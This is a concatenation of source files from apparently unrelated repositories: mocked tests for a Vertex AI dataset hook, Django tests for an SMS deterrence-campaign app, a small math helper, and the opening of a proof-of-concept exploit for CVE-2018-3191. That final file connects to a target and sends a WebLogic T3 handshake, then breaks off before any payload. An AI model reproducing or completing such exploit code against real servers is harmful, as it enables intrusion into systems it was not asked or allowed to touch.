mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_annotations(self, mock_client) -> None:
self.hook.list_annotations(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
data_item=TEST_DATA_ITEM,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_annotations.assert_called_once_with(
request=dict(
parent=mock_client.return_value.data_item_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.data_item_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID, TEST_DATA_ITEM
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_data_items(self, mock_client) -> None:
self.hook.list_data_items(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_data_items.assert_called_once_with(
request=dict(
parent=mock_client.return_value.dataset_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_datasets(self, mock_client) -> None:
self.hook.list_datasets(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_datasets.assert_called_once_with(
request=dict(
parent=mock_client.return_value.common_location_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.common_location_path.assert_called_once_with(TEST_PROJECT_ID, TEST_REGION)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_update_dataset(self, mock_client) -> None:
self.hook.update_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset_id=TEST_DATASET_ID,
dataset=TEST_DATASET,
update_mask=TEST_UPDATE_MASK,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.update_dataset.assert_called_once_with(
request=dict(
dataset=TEST_DATASET,
update_mask=TEST_UPDATE_MASK,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
class TestVertexAIWithoutDefaultProjectIdHook(TestCase):
def setUp(self):
with mock.patch(
BASE_STRING.format("GoogleBaseHook.__init__"), new=mock_base_gcp_hook_no_default_project_id
):
self.hook = DatasetHook(gcp_conn_id=TEST_GCP_CONN_ID)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_create_dataset(self, mock_client) -> None:
self.hook.create_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.create_dataset.assert_called_once_with(
request=dict(
parent=mock_client.return_value.common_location_path.return_value,
dataset=TEST_DATASET,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.common_location_path.assert_called_once_with(TEST_PROJECT_ID, TEST_REGION)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_delete_dataset(self, mock_client) -> None:
self.hook.delete_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.delete_dataset.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_export_data(self, mock_client) -> None:
self.hook.export_data(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
export_config=TEST_EXPORT_CONFIG,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.export_data.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
export_config=TEST_EXPORT_CONFIG,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_get_annotation_spec(self, mock_client) -> None:
self.hook.get_annotation_spec(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
annotation_spec=TEST_ANNOTATION_SPEC,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.get_annotation_spec.assert_called_once_with(
request=dict(
name=mock_client.return_value.annotation_spec_path.return_value,
read_mask=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.annotation_spec_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID, TEST_ANNOTATION_SPEC
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_get_dataset(self, mock_client) -> None:
self.hook.get_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.get_dataset.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
read_mask=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_import_data(self, mock_client) -> None:
self.hook.import_data(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
import_configs=TEST_IMPORT_CONFIGS,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.import_data.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
import_configs=TEST_IMPORT_CONFIGS,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_annotations(self, mock_client) -> None:
self.hook.list_annotations(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
data_item=TEST_DATA_ITEM,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_annotations.assert_called_once_with(
request=dict(
parent=mock_client.return_value.data_item_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.data_item_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID, TEST_DATA_ITEM
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_data_items(self, mock_client) -> None:
self.hook.list_data_items(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_data_items.assert_called_once_with(
request=dict(
parent=mock_client.return_value.dataset_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_datasets(self, mock_client) -> None:
self.hook.list_datasets(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_datasets.assert_called_once_with(
request=dict(
parent=mock_client.return_value.common_location_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.common_location_path.assert_called_once_with(TEST_PROJECT_ID, TEST_REGION)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_update_dataset(self, mock_client) -> None:
self.hook.update_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset_id=TEST_DATASET_ID,
dataset=TEST_DATASET,
update_mask=TEST_UPDATE_MASK,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.update_dataset.assert_called_once_with(
request=dict(
dataset=TEST_DATASET,
update_mask=TEST_UPDATE_MASK,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.test import override_settings
from django.urls import reverse
from mock import patch
from contacts.models import Contact
from phone_numbers.models import PhoneNumber
from sms.models import SmsMessage
from voice.models import Call
from deterrence.models import Deterrent
from deterrence.models import DeterrenceCampaign
from deterrence.models import DeterrenceMessage
import deterrence.tasks
@override_settings(TWILIO_PHONE_NUMBER="+18881112222",
TWILIO_ACCOUNT_SID='ACxxxx',
TWILIO_AUTH_TOKEN='yyyyyyy',
GARFIELD_NUMBER_OF_DETERRENTS=1,
GARFIELD_DETERRENT_INTERVAL=300)
class DeterrenceCampaignTestCase(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = \
Contact.objects.create(phone_number="+15556667777",
whitepages_first_name="John")
self.contact_b = Contact.objects.create(phone_number="+15556667778")
self.contact_c = Contact.objects.create(phone_number="+15556667779")
self.phone_number = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5309",
friendly_name="Stuff.",
number_type="ADV",
country_code="1")
self.det_number = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.contact_a.related_phone_numbers.add(self.phone_number)
self.contact_b.related_phone_numbers.add(self.phone_number)
self.contact_c.related_phone_numbers.add(self.phone_number)
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.",
personalize=True)
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.deterrence_campaign.related_contacts.add(self.contact_a)
self.deterrence_campaign.related_contacts.add(self.contact_b)
self.deterrence_campaign.related_contacts.add(self.contact_c)
self.message = {"From": "+15556667777",
"To": "+15558675309",
"Body": "Test."}
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_campaign(self, mock_send):
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(3,
mock_send.call_count)
campaign = DeterrenceCampaign.objects.latest('date_created')
self.assertFalse(campaign.date_sent is None)
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_do_not_deter(self, mock_send):
self.contact_a.do_not_deter = True
self.contact_a.save()
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(2, mock_send.call_count)
self.assertFalse(self.phone_number.contact_set.all()[0].deterred)
campaign = DeterrenceCampaign.objects.latest('date_created')
self.assertFalse(campaign.date_sent is None)
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_arrested(self, mock_send):
self.contact_a.arrested = True
self.contact_a.save()
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(2, mock_send.call_count)
self.assertFalse(self.phone_number.contact_set.all()[0].deterred)
campaign = DeterrenceCampaign.objects.latest('date_created')
self.assertFalse(campaign.date_sent is None)
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_recruiter(self, mock_send):
self.contact_a.recruiter = True
self.contact_a.save()
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(2, mock_send.call_count)
self.assertFalse(self.phone_number.contact_set.all()[0].deterred)
campaign = DeterrenceCampaign.objects.latest('date_created')
self.assertFalse(campaign.date_sent is None)
class DeterrenceTestCase(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = Contact.objects.create(phone_number="+15556667777")
self.contact_b = Contact.objects.create(phone_number="+15556667778")
self.contact_c = Contact.objects.create(phone_number="+15556667779")
self.phone_number = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5309",
friendly_name="Stuff.",
number_type="ADV",
country_code="1")
self.det_number = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.contact_a.related_phone_numbers.add(self.phone_number)
self.contact_b.related_phone_numbers.add(self.phone_number)
self.contact_c.related_phone_numbers.add(self.phone_number)
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.",
personalize=True)
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.deterrence_campaign.related_contacts.add(self.contact_a)
self.deterrence_campaign.related_contacts.add(self.contact_b)
self.deterrence_campaign.related_contacts.add(self.contact_c)
self.message = {"From": "+15556667777",
"To": "+15558675309",
"Body": "Test."}
@patch('deterrence.tasks.send_sms_message')
def test_send_deterrence(self, mock_send):
mock_send.side_effect = [{'MessageSid': 'MMxxx',
'Body': 'A message from Garfield.',
'Status': 'queued'}]
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
mock_send.assert_called_once_with(
from_="+15558675310",
to="+15556667777",
body="A message from Garfield.",
media_url="http://example.com/"
"{0}".format(self.deterrent.image.url),
status_callback="http://example.com"
"{0}".format(reverse('deterrence:deterrence'
'_message_status_callback')))
self.assertEqual(1,
len(DeterrenceMessage.objects.all()))
contact = Contact.objects.get(pk=self.contact_a.id)
self.assertTrue(contact.deterred)
self.assertEqual(1,
contact.deterrents_received)
@patch('deterrence.tasks.send_sms_message')
def test_send_deterrence_first_name(self, mock_send):
mock_send.side_effect = [{'MessageSid': 'MMxxx',
'Body': 'John, a message from Garfield.',
'Status': 'queued'}]
self.contact_a.whitepages_first_name = "John"
self.contact_a.save()
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
mock_send.assert_called_once_with(
from_="+15558675310",
to="+15556667777",
body="John, a message from Garfield.",
media_url="http://example.com/"
"{0}".format(self.deterrent.image.url),
status_callback="http://example.com"
"{0}".format(reverse('deterrence:deterrence'
'_message_status_callback')))
self.assertEqual(1,
len(DeterrenceMessage.objects.all()))
contact = Contact.objects.get(pk=self.contact_a.id)
self.assertTrue(contact.deterred)
@patch('deterrence.tasks.send_sms_message')
def test_send_deterrence_no_personalize(self, mock_send):
mock_send.side_effect = [{'MessageSid': 'MMxxx',
'Body': 'A message from Garfield.',
'Status': 'queued'}]
self.contact_a.whitepages_first_name = "John"
self.contact_a.save()
self.deterrent.personalize = False
self.deterrent.save()
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
mock_send.assert_called_once_with(
from_="+15558675310",
to="+15556667777",
body="A message from Garfield.",
media_url="http://example.com/"
"{0}".format(self.deterrent.image.url),
status_callback="http://example.com"
"{0}".format(reverse('deterrence:deterrence'
'_message_status_callback')))
self.assertEqual(1,
len(DeterrenceMessage.objects.all()))
contact = Contact.objects.get(pk=self.contact_a.id)
self.assertTrue(contact.deterred)
def test_send_deterrence_do_not_deter(self):
self.contact_a.do_not_deter = True
self.contact_a.save()
result = \
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
self.assertFalse(result)
self.assertFalse(self.contact_a.deterred)
def test_send_deterrence_arrested(self):
self.contact_a.arrested = True
self.contact_a.save()
result = \
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
self.assertFalse(result)
self.assertFalse(self.contact_a.deterred)
def test_send_deterrence_recruiter(self):
self.contact_a.recruiter = True
self.contact_a.save()
result = \
deterrence.tasks.send_deterrence("http://example.com",
self.deterrence_campaign.id,
self.contact_a.id)
self.assertFalse(result)
self.assertFalse(self.contact_a.deterred)
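
The three tests above (`do_not_deter`, `arrested`, `recruiter`) all assert the same early-exit behaviour: the task returns a falsy value and never marks the contact as deterred. Reduced to a standalone sketch — this is an illustration of the guard-clause pattern under test, not the project's actual task body:

```python
# Guard-clause sketch: bail out early when any opt-out flag is set.
# Contact and send_deterrence here are illustrative stand-ins.
class Contact:
    def __init__(self, do_not_deter=False, arrested=False, recruiter=False):
        self.do_not_deter = do_not_deter
        self.arrested = arrested
        self.recruiter = recruiter

def send_deterrence(contact):
    if contact.do_not_deter or contact.arrested or contact.recruiter:
        return False  # never message a flagged contact
    return True       # proceed with the deterrence message

print(send_deterrence(Contact(do_not_deter=True)))  # False
print(send_deterrence(Contact()))                   # True
```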
@override_settings(GARFIELD_NUMBER_OF_DETERRENTS=1,
GARFIELD_DETERRENT_INTERVAL=300)
class DeterrenceTestCaseMultipleNumbers(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = Contact.objects.create(phone_number="+15556667777")
self.contact_b = Contact.objects.create(phone_number="+15556667778")
self.contact_c = Contact.objects.create(phone_number="+15556667779")
self.phone_number = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5308",
friendly_name="Stuff.",
number_type="ADV",
country_code="1")
self.det_number_1 = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5309",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.det_number_2 = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.det_number_3 = PhoneNumber.objects.create(sid="PNzzz",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675311",
formatted="(555) "
"867-5311",
friendly_name="BURNED.",
number_type="DET",
burned=True,
country_code="1")
self.contact_a.related_phone_numbers.add(self.phone_number)
self.contact_b.related_phone_numbers.add(self.phone_number)
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.")
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.deterrence_campaign.related_contacts.add(self.contact_a)
self.deterrence_campaign.related_contacts.add(self.contact_b)
self.deterrence_campaign.related_contacts.add(self.contact_c)
self.contact_c.related_phone_numbers.add(self.phone_number)
self.message = {"From": "+15556667777",
"To": "+15558675309",
"Body": "Test."}
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_campaign(self, mock_send):
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(3, mock_send.call_count)
for call in mock_send.call_args_list:
args, kwargs = call
self.assertEqual(kwargs['args'][1],
self.deterrence_campaign.id)
@override_settings(GARFIELD_NUMBER_OF_DETERRENTS=3)
@patch('deterrence.tasks.send_deterrence.apply_async')
def test_send_deterrence_campaign_multiple_deterrents(self, mock_send):
deterrence.tasks.send_deterrence_campaign("http://example.com")
self.assertEqual(9, mock_send.call_count)
def test_unused_deterrence_phone_number(self):
test_1 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
DeterrenceMessage.objects \
.create(sid="MMxxx",
body="A message to you, Rudy.",
status="delivered",
related_deterrent=self.deterrent,
related_phone_number=self.det_number_2,
related_campaign=self.deterrence_campaign,
related_contact=self.contact_a)
test_2 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
self.assertEqual(test_1, self.det_number_2)
self.assertEqual(test_2, self.det_number_1)
def test_unused_deterrence_phone_number_overload(self):
test_1 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
DeterrenceMessage.objects \
.create(sid="MMxxx",
body="A message to you, Rudy.",
status="delivered",
related_deterrent=self.deterrent,
related_phone_number=self.det_number_2,
related_campaign=self.deterrence_campaign,
related_contact=self.contact_a)
test_2 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
DeterrenceMessage.objects \
.create(sid="MMxxx",
body="A message to you, Rudy.",
status="delivered",
related_deterrent=self.deterrent,
related_phone_number=self.det_number_1,
related_campaign=self.deterrence_campaign,
related_contact=self.contact_a)
test_3 = \
deterrence.tasks \
.get_unused_deterrence_phone_number(self.contact_a)
self.assertEqual(test_1, self.det_number_2)
self.assertEqual(test_2, self.det_number_1)
self.assertEqual(test_3, self.det_number_2)
class DeterrenceCheckCampaignTestCase(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = Contact.objects.create(phone_number="+15556667777")
self.contact_b = Contact.objects.create(phone_number="+15556667778")
self.contact_c = Contact.objects.create(phone_number="+15556667779")
self.phone_number = PhoneNumber.objects.create(sid="PNxxx",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675309",
formatted="(555) "
"867-5309",
friendly_name="Stuff.",
number_type="ADV",
country_code="1")
self.det_number = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
self.contact_a.related_phone_numbers.add(self.phone_number)
self.contact_b.related_phone_numbers.add(self.phone_number)
self.contact_c.related_phone_numbers.add(self.phone_number)
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.")
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.message = {"From": "+15556667777",
"To": "+15558675309",
"Body": "Test."}
def test_check_campaign_for_contact(self):
test = deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
campaign = \
DeterrenceCampaign.objects.get(pk=self.deterrence_campaign.id)
self.assertFalse(test)
self.assertEqual(1,
len(DeterrenceCampaign.objects.all()))
self.assertEqual(campaign.related_contacts.all()[0],
self.contact_a)
def test_check_campaign_for_contact_already_present(self):
self.deterrence_campaign.related_contacts.add(self.contact_b)
self.deterrence_campaign.save()
test = deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
self.assertFalse(test)
second_test = \
deterrence.tasks.check_campaign_for_contact(self.contact_b.id)
campaign = \
DeterrenceCampaign.objects.get(pk=self.deterrence_campaign.id)
self.assertTrue(second_test)
self.assertEqual(2,
len(campaign.related_contacts.all()))
def test_check_campaign_for_contact_campaign_does_not_exist(self):
self.deterrence_campaign.delete()
test = deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
campaigns = DeterrenceCampaign.objects.all()
self.assertFalse(test)
self.assertEqual(1,
len(campaigns))
self.assertEqual(campaigns[0].related_contacts.all()[0],
self.contact_a)
def test_check_campaign_for_contact_multiple_attempts(self):
self.deterrence_campaign.related_contacts.add(self.contact_a)
deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
deterrence.tasks.check_campaign_for_contact(self.contact_a.id)
campaigns = DeterrenceCampaign.objects.all()
self.assertEqual(1,
len(campaigns))
self.assertEqual(1,
len(campaigns[0].related_contacts.all()))
self.assertEqual(campaigns[0].related_contacts.all()[0],
self.contact_a)
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
def test_only_add_to_campaign_if_sms_advertising_number(self,
mock_check):
SmsMessage.objects.create(to_number="+15558675310",
from_number="+15556667777",
body="Test.",
related_contact=self.contact_a,
related_phone_number=self.det_number)
self.assertFalse(mock_check.called)
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
def test_only_add_to_campaign_if_call_advertising_number(self,
mock_check):
Call.objects.create(to_number="+15558675310",
from_number="+15556667777",
related_contact=self.contact_a,
related_phone_number=self.det_number)
self.assertFalse(mock_check.called)
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
def test_add_to_campaign_if_call_advertising_number(self,
mock_check):
Call.objects.create(to_number="+15558675309",
from_number="+15556667777",
related_contact=self.contact_a,
related_phone_number=self.phone_number)
self.assertTrue(mock_check.called)
class DeterrenceMessageStatusCallbackTestCase(TestCase):
@patch('deterrence.tasks.check_campaign_for_contact.apply_async')
@patch('contacts.tasks.lookup_contact.apply_async')
def setUp(self, mock_lookup, mock_check_campaign):
self.contact_a = Contact.objects.create(phone_number="+15556667777")
self.det_number = PhoneNumber.objects.create(sid="PNyyy",
account_sid="ACxxx",
service_sid="SExxx",
url="http://exmple.com",
e164="+15558675310",
formatted="(555) "
"867-5310",
friendly_name="Stuff.",
number_type="DET",
country_code="1")
image = SimpleUploadedFile(name="example_image.png",
content=open("./deterrence/tests/assets/"
"example_image.png",
"rb").read(),
content_type="image/png")
self.deterrent = Deterrent.objects.create(image=image,
body="A message from "
"Garfield.")
self.deterrence_campaign = \
DeterrenceCampaign.objects \
.create(related_deterrent=self.deterrent)
self.deterrence_message = \
DeterrenceMessage.objects \
.create(sid="MMxxxx",
body="A message to you, Rudy.",
status="queued",
related_phone_number=self.det_number,
related_campaign=self.deterrence_campaign,
related_contact=self.contact_a,
related_deterrent=self.deterrent)
def test_handle_deterrence_message_status_callback(self):
deterrence.tasks \
.handle_deterrence_message_status_callback("MMxxxx",
"delivered")
message = DeterrenceMessage.objects.get(sid="MMxxxx")
self.assertEqual("delivered",
message.status)
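
Throughout this suite, `@patch` swaps out the task's messaging dependency and `side_effect` scripts the Twilio-style response it returns, while `assert_called_once_with` pins the exact outgoing arguments. A minimal standalone illustration of that mocking pattern (the payload keys mirror the tests above; the call itself is illustrative):

```python
from unittest.mock import MagicMock

# Script the mock to return one queued-message payload, as the tests above do.
mock_send = MagicMock(side_effect=[{'MessageSid': 'MMxxx', 'Status': 'queued'}])

result = mock_send(from_="+15558675310", to="+15556667777")

# Verify both the exact call arguments and the scripted return value.
mock_send.assert_called_once_with(from_="+15558675310", to="+15556667777")
print(result['Status'])  # queued
```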
# File: SIT/Python/myMath.py (repo: mcdulltii/coding, license: Apache-2.0)
def add(x, y): return x+y
def subtraction(x, y): return x-y
def evenNum(x): return [y for y in x if y % 2 == 0]
def maximum(x): return max(x)
def minimum(x): return min(x)
def absolute(x): return abs(x)
def sumTotal(x): return sum(x)
def clear(x): return [0 for y in x]
def main(): pass
if __name__ == '__main__':
    main()
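
A quick sanity check of these one-line helpers — the definitions are restated below so the snippet runs standalone:

```python
# Restating the one-line helpers from myMath.py for a self-contained check.
def add(x, y): return x + y
def evenNum(x): return [y for y in x if y % 2 == 0]
def sumTotal(x): return sum(x)
def clear(x): return [0 for y in x]

nums = [3, 1, 4, 1, 5, 9, 2, 6]
print(add(2, 3))       # 5
print(evenNum(nums))   # [4, 2, 6]
print(sumTotal(nums))  # 31
print(clear(nums))     # [0, 0, 0, 0, 0, 0, 0, 0]
```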
# File: POC/CVE_2018_3191.py (repo: Erosion2020/SpaceCore, license: MIT)
import re
import socket
import struct
import time
import urllib3
urllib3.disable_warnings()
index = "CVE_2018_3191"
def start(ip, port):
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.settimeout(10)
try:
con.connect((ip, port))
con.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
time.sleep(2)
    except ConnectionRefusedError:
        print(f"Connection to target {ip}:{port} was refused")
    except socket.timeout:
        print(f"Connection to target {ip}:{port} timed out")
con.recv(1024)
data = [
